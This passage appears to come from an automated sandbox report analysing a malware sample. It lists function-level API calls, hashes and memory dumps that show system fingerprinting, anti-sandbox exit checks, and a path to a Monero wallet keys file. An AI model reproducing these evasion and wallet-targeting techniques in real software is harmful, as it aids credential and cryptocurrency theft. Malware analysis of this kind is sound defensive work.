Opcode ID: 0720f8566122a2ed5aa61d12a0fd24a1bc2b5f1f1f396c2ca2c8ee4ca75302c6
Instruction ID: dde791ff18e9f35cfa43f8890753c7f3eff71bc6582ffd31cde46f228a51e489
Opcode Fuzzy Hash: 0720f8566122a2ed5aa61d12a0fd24a1bc2b5f1f1f396c2ca2c8ee4ca75302c6
Instruction Fuzzy Hash: 5E211B7190121C9BEB24DB54DC85FE9B3B8FB58700F00C5D9E60A96140DF756A86CFE4

Function 008A7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A76A4
RtlAllocateHeap.NTDLL(00000000), ref: 008A76AB
RegOpenKeyExA.KERNEL32(80000002,0141C438,00000000,00020119,00000000), ref: 008A76DD
RegQueryValueExA.KERNEL32(00000000,0142DF00,00000000,00000000,?,000000FF), ref: 008A76FE
RegCloseKey.ADVAPI32(00000000), ref: 008A7708

Strings

Windows 11, xrefs: 008A76BD

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 6ad8a8b2cf2fcbc71c6124cfc3a73007ef14d5a7a7fc53f60827c1395f91b335
Instruction ID: a54a25e3a1dac1afceb5c5b2885630d3029fd03bcf31aab32f193a26722fbf92
Opcode Fuzzy Hash: 6ad8a8b2cf2fcbc71c6124cfc3a73007ef14d5a7a7fc53f60827c1395f91b335
Instruction Fuzzy Hash: FD014BB5A45208BFEB00DBE4DC49FAEB7B8EB58701F108056FA06D7290E67499069B52

Function 008A7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7734
RtlAllocateHeap.NTDLL(00000000), ref: 008A773B
RegOpenKeyExA.KERNEL32(80000002,0141C438,00000000,00020119,008A76B9), ref: 008A775B
RegQueryValueExA.KERNEL32(008A76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008A777A
RegCloseKey.ADVAPI32(008A76B9), ref: 008A7784

Strings

CurrentBuildNumber, xrefs: 008A7771

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 1fe0e6c799cf6b4f3ac87666d950c3ae585e3958faf4cd4b8799a882c1d21244
Instruction ID: 05c38f8622185dfb4223ac2bb1b40505692249ba1f452e3f00738cdc8476f1cd
Opcode Fuzzy Hash: 1fe0e6c799cf6b4f3ac87666d950c3ae585e3958faf4cd4b8799a882c1d21244
Instruction Fuzzy Hash: 5C0144B5A40308BBE700DFE4DC49FAEB7B8FB54700F004555FA06E7281D67055019B51

Function 008A69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422500), ref: 008A98A1
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,014223B0), ref: 008A98BA
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,014224E8), ref: 008A98D2
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422440), ref: 008A98EA
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422410), ref: 008A9903
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01429278), ref: 008A991B
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01415830), ref: 008A9933
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,014156F0), ref: 008A994C
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422308), ref: 008A9964
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,014224A0), ref: 008A997C
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,014224D0), ref: 008A9995
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422218), ref: 008A99AD
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01415710), ref: 008A99C5
Part of subcall function 008A9860: GetProcAddress.KERNEL32(74DD0000,01422458), ref: 008A99DE

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008911D0: ExitProcess.KERNEL32 ref: 00891211

Part of subcall function 00891160: GetSystemInfo.KERNEL32(?), ref: 0089116A
Part of subcall function 00891160: ExitProcess.KERNEL32 ref: 0089117E

Part of subcall function 00891110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0089112B
Part of subcall function 00891110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00891132
Part of subcall function 00891110: ExitProcess.KERNEL32 ref: 00891143

Part of subcall function 00891220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0089123E
Part of subcall function 00891220: ExitProcess.KERNEL32 ref: 00891294

Part of subcall function 008A6770: GetUserDefaultLangID.KERNEL32 ref: 008A6774

Part of subcall function 00891190: ExitProcess.KERNEL32 ref: 008911C6

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01429228,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A6AE8
CloseHandle.KERNEL32(00000000), ref: 008A6AF9
Sleep.KERNEL32(00001770), ref: 008A6B04
CloseHandle.KERNEL32(?,00000000,?,01429228,?,008B110C,?,00000000,?,008B1110,?,00000000,008B0AEF), ref: 008A6B1A
ExitProcess.KERNEL32 ref: 008A6B22

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: b35f9056d77aa955d5c946c0d9169d0dc4daf1d923807c959c0b462bf508b371
Instruction ID: 26dabfb7ecfa2f9796e4d544e61211ca4c187d13853d97b7e04360ac6948a94d
Opcode Fuzzy Hash: b35f9056d77aa955d5c946c0d9169d0dc4daf1d923807c959c0b462bf508b371
Instruction Fuzzy Hash: 0C311C70904108AAEB48F7E8DC56BEE7778FF15300F144529F212E6991EF786905C6A3

Function 008999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
LocalFree.KERNEL32(0089148F), ref: 00899A90
CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: d2b6b3ab75ee8b38e3dac8b4f0c653f5556705c5d46c12e7465c283f90acdc60
Instruction ID: f35163e4b26c303b3be62e53214085c28eb36ee8b5843fd52ad898c0ac49bc32
Opcode Fuzzy Hash: d2b6b3ab75ee8b38e3dac8b4f0c653f5556705c5d46c12e7465c283f90acdc60
Instruction Fuzzy Hash: 923116B4A00209EFDF14DF98C885BAE77F5FF48350F108158E902A7290D778AA41CFA1

Function 008A4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0142E188), ref: 008A47DB

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4801
lstrcat.KERNEL32(?,?), ref: 008A4820
lstrcat.KERNEL32(?,?), ref: 008A4834
lstrcat.KERNEL32(?,0141B978), ref: 008A4847
lstrcat.KERNEL32(?,?), ref: 008A485B
lstrcat.KERNEL32(?,0142DBA0), ref: 008A486F

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8D90: GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Part of subcall function 008A4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008A4580
Part of subcall function 008A4570: RtlAllocateHeap.NTDLL(00000000), ref: 008A4587
Part of subcall function 008A4570: wsprintfA.USER32 ref: 008A45A6
Part of subcall function 008A4570: FindFirstFileA.KERNEL32(?,?), ref: 008A45BD

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 2a2db82906f945f0381cb697d89538b8b0a8496a6092d2965cd2f08b0f885e2e
Instruction ID: aa74739d4681904c32aca2f8aa4cb2e65bd251750e98527ab24ec4f862b03b69
Opcode Fuzzy Hash: 2a2db82906f945f0381cb697d89538b8b0a8496a6092d2965cd2f08b0f885e2e
Instruction Fuzzy Hash: AD3180B2D00208A7DB14FBF4DC85EEE7378FB58700F444589B71A96091EE749689CBA2

Function 008A40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0142DD20,00000000,00020119,?), ref: 008A40F4
RegQueryValueExA.ADVAPI32(?,0142E1A0,00000000,00000000,00000000,000000FF), ref: 008A4118
RegCloseKey.ADVAPI32(?), ref: 008A4122
lstrcat.KERNEL32(?,00000000), ref: 008A4147
lstrcat.KERNEL32(?,0142E458), ref: 008A415B

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 55dd373a2baf86f506bcd08ea11744a2b36439b1aa424599936e2541b6e3ab95
Instruction ID: 6f7498fefdce8f85d25733159031fc14bf563e0478e02683a77451dedd5f9cc7
Opcode Fuzzy Hash: 55dd373a2baf86f506bcd08ea11744a2b36439b1aa424599936e2541b6e3ab95
Instruction Fuzzy Hash: 9941D5B6D00108ABDF14FBE4DC4AFEE733DFB98300F444549B61696181EA715B888BA3

Function 008A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7E37
RtlAllocateHeap.NTDLL(00000000), ref: 008A7E3E
RegOpenKeyExA.KERNEL32(80000002,0141BFD8,00000000,00020119,?), ref: 008A7E5E
RegQueryValueExA.KERNEL32(?,0142DB80,00000000,00000000,000000FF,000000FF), ref: 008A7E7F
RegCloseKey.ADVAPI32(?), ref: 008A7E92

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
